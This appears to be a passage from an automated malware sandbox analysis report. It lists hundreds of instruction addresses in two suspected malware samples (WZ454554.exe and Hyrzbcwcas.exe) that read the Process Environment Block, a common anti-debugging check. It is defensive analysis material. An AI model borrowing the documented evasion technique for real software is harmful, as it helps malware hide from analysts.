                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AE2990 mov eax, dword ptr fs:[00000030h]9_2_00AE2990
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ABB1E1 mov eax, dword ptr fs:[00000030h]9_2_00ABB1E1
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ABB1E1 mov eax, dword ptr fs:[00000030h]9_2_00ABB1E1
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ABB1E1 mov eax, dword ptr fs:[00000030h]9_2_00ABB1E1
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B441E8 mov eax, dword ptr fs:[00000030h]9_2_00B441E8
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AD4120 mov eax, dword ptr fs:[00000030h]9_2_00AD4120
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AD4120 mov eax, dword ptr fs:[00000030h]9_2_00AD4120
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AD4120 mov eax, dword ptr fs:[00000030h]9_2_00AD4120
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AD4120 mov eax, dword ptr fs:[00000030h]9_2_00AD4120
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AD4120 mov ecx, dword ptr fs:[00000030h]9_2_00AD4120
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AE513A mov eax, dword ptr fs:[00000030h]9_2_00AE513A
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AE513A mov eax, dword ptr fs:[00000030h]9_2_00AE513A
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AB9100 mov eax, dword ptr fs:[00000030h]9_2_00AB9100
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AB9100 mov eax, dword ptr fs:[00000030h]9_2_00AB9100
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AB9100 mov eax, dword ptr fs:[00000030h]9_2_00AB9100
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ABC962 mov eax, dword ptr fs:[00000030h]9_2_00ABC962
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ABB171 mov eax, dword ptr fs:[00000030h]9_2_00ABB171
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ABB171 mov eax, dword ptr fs:[00000030h]9_2_00ABB171
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ADB944 mov eax, dword ptr fs:[00000030h]9_2_00ADB944
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ADB944 mov eax, dword ptr fs:[00000030h]9_2_00ADB944
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AB52A5 mov eax, dword ptr fs:[00000030h]9_2_00AB52A5
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AB52A5 mov eax, dword ptr fs:[00000030h]9_2_00AB52A5
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AB52A5 mov eax, dword ptr fs:[00000030h]9_2_00AB52A5
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AB52A5 mov eax, dword ptr fs:[00000030h]9_2_00AB52A5
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AB52A5 mov eax, dword ptr fs:[00000030h]9_2_00AB52A5
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ACAAB0 mov eax, dword ptr fs:[00000030h]9_2_00ACAAB0
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ACAAB0 mov eax, dword ptr fs:[00000030h]9_2_00ACAAB0
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AEFAB0 mov eax, dword ptr fs:[00000030h]9_2_00AEFAB0
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AED294 mov eax, dword ptr fs:[00000030h]9_2_00AED294
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AED294 mov eax, dword ptr fs:[00000030h]9_2_00AED294
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AE2AE4 mov eax, dword ptr fs:[00000030h]9_2_00AE2AE4
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AE2ACB mov eax, dword ptr fs:[00000030h]9_2_00AE2ACB
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AF4A2C mov eax, dword ptr fs:[00000030h]9_2_00AF4A2C
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AF4A2C mov eax, dword ptr fs:[00000030h]9_2_00AF4A2C
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ADA229 mov eax, dword ptr fs:[00000030h]9_2_00ADA229
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ADA229 mov eax, dword ptr fs:[00000030h]9_2_00ADA229
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ADA229 mov eax, dword ptr fs:[00000030h]9_2_00ADA229
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ADA229 mov eax, dword ptr fs:[00000030h]9_2_00ADA229
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ADA229 mov eax, dword ptr fs:[00000030h]9_2_00ADA229
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ADA229 mov eax, dword ptr fs:[00000030h]9_2_00ADA229
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ADA229 mov eax, dword ptr fs:[00000030h]9_2_00ADA229
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ADA229 mov eax, dword ptr fs:[00000030h]9_2_00ADA229
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ADA229 mov eax, dword ptr fs:[00000030h]9_2_00ADA229
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B7AA16 mov eax, dword ptr fs:[00000030h]9_2_00B7AA16
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B7AA16 mov eax, dword ptr fs:[00000030h]9_2_00B7AA16
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AC8A0A mov eax, dword ptr fs:[00000030h]9_2_00AC8A0A
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AD3A1C mov eax, dword ptr fs:[00000030h]9_2_00AD3A1C
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AB5210 mov eax, dword ptr fs:[00000030h]9_2_00AB5210
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AB5210 mov ecx, dword ptr fs:[00000030h]9_2_00AB5210
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AB5210 mov eax, dword ptr fs:[00000030h]9_2_00AB5210
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AB5210 mov eax, dword ptr fs:[00000030h]9_2_00AB5210
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ABAA16 mov eax, dword ptr fs:[00000030h]9_2_00ABAA16
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ABAA16 mov eax, dword ptr fs:[00000030h]9_2_00ABAA16
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AF927A mov eax, dword ptr fs:[00000030h]9_2_00AF927A
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B6B260 mov eax, dword ptr fs:[00000030h]9_2_00B6B260
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B6B260 mov eax, dword ptr fs:[00000030h]9_2_00B6B260
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B88A62 mov eax, dword ptr fs:[00000030h]9_2_00B88A62
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B7EA55 mov eax, dword ptr fs:[00000030h]9_2_00B7EA55
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B44257 mov eax, dword ptr fs:[00000030h]9_2_00B44257
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AB9240 mov eax, dword ptr fs:[00000030h]9_2_00AB9240
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AB9240 mov eax, dword ptr fs:[00000030h]9_2_00AB9240
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AB9240 mov eax, dword ptr fs:[00000030h]9_2_00AB9240
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AB9240 mov eax, dword ptr fs:[00000030h]9_2_00AB9240
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AE4BAD mov eax, dword ptr fs:[00000030h]9_2_00AE4BAD
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AE4BAD mov eax, dword ptr fs:[00000030h]9_2_00AE4BAD
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AE4BAD mov eax, dword ptr fs:[00000030h]9_2_00AE4BAD
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B85BA5 mov eax, dword ptr fs:[00000030h]9_2_00B85BA5
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AC1B8F mov eax, dword ptr fs:[00000030h]9_2_00AC1B8F
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AC1B8F mov eax, dword ptr fs:[00000030h]9_2_00AC1B8F
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B6D380 mov ecx, dword ptr fs:[00000030h]9_2_00B6D380
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AE2397 mov eax, dword ptr fs:[00000030h]9_2_00AE2397
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B7138A mov eax, dword ptr fs:[00000030h]9_2_00B7138A
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AEB390 mov eax, dword ptr fs:[00000030h]9_2_00AEB390
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00ADDBE9 mov eax, dword ptr fs:[00000030h]9_2_00ADDBE9
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AE03E2 mov eax, dword ptr fs:[00000030h]9_2_00AE03E2
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AE03E2 mov eax, dword ptr fs:[00000030h]9_2_00AE03E2
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AE03E2 mov eax, dword ptr fs:[00000030h]9_2_00AE03E2
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AE03E2 mov eax, dword ptr fs:[00000030h]9_2_00AE03E2
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AE03E2 mov eax, dword ptr fs:[00000030h]9_2_00AE03E2
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00AE03E2 mov eax, dword ptr fs:[00000030h]9_2_00AE03E2
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B353CA mov eax, dword ptr fs:[00000030h]9_2_00B353CA
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 9_2_00B353CA mov eax, dword ptr fs:[00000030h]9_2_00B353CA
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA90AF mov eax, dword ptr fs:[00000030h]17_2_00AA90AF
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A920A0 mov eax, dword ptr fs:[00000030h]17_2_00A920A0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A920A0 mov eax, dword ptr fs:[00000030h]17_2_00A920A0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A920A0 mov eax, dword ptr fs:[00000030h]17_2_00A920A0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A920A0 mov eax, dword ptr fs:[00000030h]17_2_00A920A0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A920A0 mov eax, dword ptr fs:[00000030h]17_2_00A920A0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A920A0 mov eax, dword ptr fs:[00000030h]17_2_00A920A0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A9F0BF mov ecx, dword ptr fs:[00000030h]17_2_00A9F0BF
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A9F0BF mov eax, dword ptr fs:[00000030h]17_2_00A9F0BF
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A9F0BF mov eax, dword ptr fs:[00000030h]17_2_00A9F0BF
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A69080 mov eax, dword ptr fs:[00000030h]17_2_00A69080
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AE3884 mov eax, dword ptr fs:[00000030h]17_2_00AE3884
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AE3884 mov eax, dword ptr fs:[00000030h]17_2_00AE3884
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A640E1 mov eax, dword ptr fs:[00000030h]17_2_00A640E1
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A640E1 mov eax, dword ptr fs:[00000030h]17_2_00A640E1
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A640E1 mov eax, dword ptr fs:[00000030h]17_2_00A640E1
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A658EC mov eax, dword ptr fs:[00000030h]17_2_00A658EC
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]17_2_00AFB8D0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AFB8D0 mov ecx, dword ptr fs:[00000030h]17_2_00AFB8D0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]17_2_00AFB8D0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]17_2_00AFB8D0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]17_2_00AFB8D0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]17_2_00AFB8D0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A9002D mov eax, dword ptr fs:[00000030h]17_2_00A9002D
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A9002D mov eax, dword ptr fs:[00000030h]17_2_00A9002D
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A9002D mov eax, dword ptr fs:[00000030h]17_2_00A9002D
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A9002D mov eax, dword ptr fs:[00000030h]17_2_00A9002D
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A9002D mov eax, dword ptr fs:[00000030h]17_2_00A9002D
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A7B02A mov eax, dword ptr fs:[00000030h]17_2_00A7B02A
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A7B02A mov eax, dword ptr fs:[00000030h]17_2_00A7B02A
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A7B02A mov eax, dword ptr fs:[00000030h]17_2_00A7B02A
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A7B02A mov eax, dword ptr fs:[00000030h]17_2_00A7B02A
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B34015 mov eax, dword ptr fs:[00000030h]17_2_00B34015
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B34015 mov eax, dword ptr fs:[00000030h]17_2_00B34015
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AE7016 mov eax, dword ptr fs:[00000030h]17_2_00AE7016
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AE7016 mov eax, dword ptr fs:[00000030h]17_2_00AE7016
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AE7016 mov eax, dword ptr fs:[00000030h]17_2_00AE7016
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B22073 mov eax, dword ptr fs:[00000030h]17_2_00B22073
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B31074 mov eax, dword ptr fs:[00000030h]17_2_00B31074
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A80050 mov eax, dword ptr fs:[00000030h]17_2_00A80050
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A80050 mov eax, dword ptr fs:[00000030h]17_2_00A80050
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AE69A6 mov eax, dword ptr fs:[00000030h]17_2_00AE69A6
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A961A0 mov eax, dword ptr fs:[00000030h]17_2_00A961A0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A961A0 mov eax, dword ptr fs:[00000030h]17_2_00A961A0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AE51BE mov eax, dword ptr fs:[00000030h]17_2_00AE51BE
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AE51BE mov eax, dword ptr fs:[00000030h]17_2_00AE51BE
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AE51BE mov eax, dword ptr fs:[00000030h]17_2_00AE51BE
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AE51BE mov eax, dword ptr fs:[00000030h]17_2_00AE51BE
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B249A4 mov eax, dword ptr fs:[00000030h]17_2_00B249A4
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B249A4 mov eax, dword ptr fs:[00000030h]17_2_00B249A4
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B249A4 mov eax, dword ptr fs:[00000030h]17_2_00B249A4
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B249A4 mov eax, dword ptr fs:[00000030h]17_2_00B249A4
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A8C182 mov eax, dword ptr fs:[00000030h]17_2_00A8C182
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A9A185 mov eax, dword ptr fs:[00000030h]17_2_00A9A185
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A92990 mov eax, dword ptr fs:[00000030h]17_2_00A92990
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A6B1E1 mov eax, dword ptr fs:[00000030h]17_2_00A6B1E1
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A6B1E1 mov eax, dword ptr fs:[00000030h]17_2_00A6B1E1
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A6B1E1 mov eax, dword ptr fs:[00000030h]17_2_00A6B1E1
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AF41E8 mov eax, dword ptr fs:[00000030h]17_2_00AF41E8
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A84120 mov eax, dword ptr fs:[00000030h]17_2_00A84120
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A84120 mov eax, dword ptr fs:[00000030h]17_2_00A84120
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A84120 mov eax, dword ptr fs:[00000030h]17_2_00A84120
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A84120 mov eax, dword ptr fs:[00000030h]17_2_00A84120
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A84120 mov ecx, dword ptr fs:[00000030h]17_2_00A84120
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A9513A mov eax, dword ptr fs:[00000030h]17_2_00A9513A
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A9513A mov eax, dword ptr fs:[00000030h]17_2_00A9513A
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A69100 mov eax, dword ptr fs:[00000030h]17_2_00A69100
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A69100 mov eax, dword ptr fs:[00000030h]17_2_00A69100
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A69100 mov eax, dword ptr fs:[00000030h]17_2_00A69100
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A6C962 mov eax, dword ptr fs:[00000030h]17_2_00A6C962
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A6B171 mov eax, dword ptr fs:[00000030h]17_2_00A6B171
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A6B171 mov eax, dword ptr fs:[00000030h]17_2_00A6B171
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A8B944 mov eax, dword ptr fs:[00000030h]17_2_00A8B944
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A8B944 mov eax, dword ptr fs:[00000030h]17_2_00A8B944
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A652A5 mov eax, dword ptr fs:[00000030h]17_2_00A652A5
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A652A5 mov eax, dword ptr fs:[00000030h]17_2_00A652A5
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A652A5 mov eax, dword ptr fs:[00000030h]17_2_00A652A5
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A652A5 mov eax, dword ptr fs:[00000030h]17_2_00A652A5
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A652A5 mov eax, dword ptr fs:[00000030h]17_2_00A652A5
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A7AAB0 mov eax, dword ptr fs:[00000030h]17_2_00A7AAB0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A7AAB0 mov eax, dword ptr fs:[00000030h]17_2_00A7AAB0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A9FAB0 mov eax, dword ptr fs:[00000030h]17_2_00A9FAB0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A9D294 mov eax, dword ptr fs:[00000030h]17_2_00A9D294
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A9D294 mov eax, dword ptr fs:[00000030h]17_2_00A9D294
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A92AE4 mov eax, dword ptr fs:[00000030h]17_2_00A92AE4
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A92ACB mov eax, dword ptr fs:[00000030h]17_2_00A92ACB
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A8A229 mov eax, dword ptr fs:[00000030h]17_2_00A8A229
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A8A229 mov eax, dword ptr fs:[00000030h]17_2_00A8A229
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A8A229 mov eax, dword ptr fs:[00000030h]17_2_00A8A229
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A8A229 mov eax, dword ptr fs:[00000030h]17_2_00A8A229
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A8A229 mov eax, dword ptr fs:[00000030h]17_2_00A8A229
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A8A229 mov eax, dword ptr fs:[00000030h]17_2_00A8A229
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A8A229 mov eax, dword ptr fs:[00000030h]17_2_00A8A229
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A8A229 mov eax, dword ptr fs:[00000030h]17_2_00A8A229
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A8A229 mov eax, dword ptr fs:[00000030h]17_2_00A8A229
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA4A2C mov eax, dword ptr fs:[00000030h]17_2_00AA4A2C
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA4A2C mov eax, dword ptr fs:[00000030h]17_2_00AA4A2C
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B2AA16 mov eax, dword ptr fs:[00000030h]17_2_00B2AA16
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B2AA16 mov eax, dword ptr fs:[00000030h]17_2_00B2AA16
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A78A0A mov eax, dword ptr fs:[00000030h]17_2_00A78A0A
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A6AA16 mov eax, dword ptr fs:[00000030h]17_2_00A6AA16
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A6AA16 mov eax, dword ptr fs:[00000030h]17_2_00A6AA16
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A83A1C mov eax, dword ptr fs:[00000030h]17_2_00A83A1C
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A65210 mov eax, dword ptr fs:[00000030h]17_2_00A65210
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A65210 mov ecx, dword ptr fs:[00000030h]17_2_00A65210
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A65210 mov eax, dword ptr fs:[00000030h]17_2_00A65210
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A65210 mov eax, dword ptr fs:[00000030h]17_2_00A65210
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AA927A mov eax, dword ptr fs:[00000030h]17_2_00AA927A
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B1B260 mov eax, dword ptr fs:[00000030h]17_2_00B1B260
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B1B260 mov eax, dword ptr fs:[00000030h]17_2_00B1B260
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B38A62 mov eax, dword ptr fs:[00000030h]17_2_00B38A62
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A69240 mov eax, dword ptr fs:[00000030h]17_2_00A69240
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A69240 mov eax, dword ptr fs:[00000030h]17_2_00A69240
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A69240 mov eax, dword ptr fs:[00000030h]17_2_00A69240
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A69240 mov eax, dword ptr fs:[00000030h]17_2_00A69240
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B2EA55 mov eax, dword ptr fs:[00000030h]17_2_00B2EA55
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00AF4257 mov eax, dword ptr fs:[00000030h]17_2_00AF4257
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A94BAD mov eax, dword ptr fs:[00000030h]17_2_00A94BAD
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A94BAD mov eax, dword ptr fs:[00000030h]17_2_00A94BAD
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A94BAD mov eax, dword ptr fs:[00000030h]17_2_00A94BAD
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B35BA5 mov eax, dword ptr fs:[00000030h]17_2_00B35BA5
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A71B8F mov eax, dword ptr fs:[00000030h]17_2_00A71B8F
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00A71B8F mov eax, dword ptr fs:[00000030h]17_2_00A71B8F
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 17_2_00B1D380 mov ecx, dword ptr fs:[00000030h]17_2_00B1D380
